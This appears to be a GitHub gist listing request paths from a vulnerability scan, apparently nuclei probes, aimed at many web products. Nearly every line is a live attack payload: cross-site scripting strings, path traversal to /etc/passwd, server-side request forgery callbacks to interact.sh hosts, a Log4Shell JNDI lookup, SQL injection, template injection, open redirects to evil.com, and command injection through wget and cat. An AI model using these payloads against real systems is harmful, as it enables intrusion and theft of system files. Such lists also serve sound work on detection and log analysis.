"/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/badging/badge_print_v0.php?tpl=../../../../../etc/passwd",
"/system/sharedir.php",
"/cgi-bin/stats",
"/%2F/",
"/webtools/control/xmlrpc",
"/ui/PWResetUserValidation",
"/cgi-bin/test-cgi",
"/DnnImageHandler.ashx?mode=file&url=http://cadgqm02toabu64p21o0ckqkjtyyn456g.interact.sh",
"/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=",
"/OA_HTML/lcmServiceController.jsp",
"/cgi-bin/mt/mt-xmlrpc.cgi",
"/Autodiscover/Autodiscover.xml",
"/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00",
"/login?redir=http://www.example.com",
"/error3?msg=30&data=';alert('nuclei');//",
"/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd",
"/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ee3esq=1",
"/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00",
"/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=%60wget",
"/index.php?redirect=/%5C/evil.com/",
"/mantis/verify.php?id=1&confirm_hash=",
"/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&model=5160&optioncss=print",
"/?rest_route=/wp/v2/users/",
"/manage/webshell/u?s=5&w=218&h=15&k=service%0Assh%0Adisable%0A&l=62&_=5621298674064",
"/admin/user.php",
"/public/css/2A6ShoUMkrPr835vB3Y6Pz5JRjc.css",
"/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com",
"/assets/backend/elfinder/elfinder-cke.html",
"/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00",
"/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2",
"/wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(document.domain)+x%3D",
"/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../",
"/clients/editclient.php?id=2A6ShoHQnIEl1tlLYe2IMZGm5uV&action=update",
"/uir//etc/passwd",
"/pages/systemcall.php?command=cat%20/etc/passwd",
"/Umbraco/feedproxy.aspx?url=http://cadgqm02toabu64p21o0ckoqnqeyc56p1.interact.sh",
"/secure/ContactAdministrators!default.jspa",
"/wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert(%60document.domain%60)+x",
"/?x=$%7Bjndi:ldap://127.0.0.1",
"/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image",
"/cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/actions/seomatic/meta-container/all-meta-containers?uri=%7B%7B228*'98'%7D%7D",
"/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com",
"/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://%3C/script%3E%3Csvg/onload=alert('2A6ShpKRDoAFXOqCqSec1USMLKq')%3E",
"/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd",
"/s/2A6ShsMcDmQV0cd8gIXvtJEjHtx/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml",
"/+CSCOT+/translation-table?type=mst&textdomain=/%2BCSCOE%2B/portal_inc.lua&default-language&lang=../",
"/login.action",
"/webmail/old/calendar/minimizer/index.php?script=...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2Fetc%2Fpasswd",
"/GponForm/diag_Form?images/",
"/index.php?m=user&c=Users&a=logout&referurl=https://example.com",
"/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin",
"/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences",
"/changePassword?username=administrator",
"/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404",
"/PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID='%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E",
"/?q=user%2Flogin",
"/casa/nodes/thumbprints",
"/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd",
"/ws_utc/resources/setting/keystore",
"/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd",
"/cgi-bin/system_log.cgi",
"/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3Dalert(document.domain)+xx=%22test&from_url=x",
"/logos_clients/1.php",
"/opensis/index.php",
"/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com",
"/admin/data/autosuggest-remote.php?q=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E",
"/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd",
"/..%2F..%2F..%2F..%2F..%2F../etc/passwd",
"/example.com",
"/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/BSW_cxttongr.htm",
"/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00",
"/fmangersub?cpath=../../../../../../../etc/passwd",
"/_vti_inf.html",
"/user.action",
"/2A6ShpqNoYB8uIkSVBRkdp4WITD.jsp",
"/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/meaweb/os/mxperson",
"/composer/send_email?to=xyUD@xyUD&url=http://cadgqm02toabu64p21o0ckxh5eoyjnexy.interact.sh"
]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment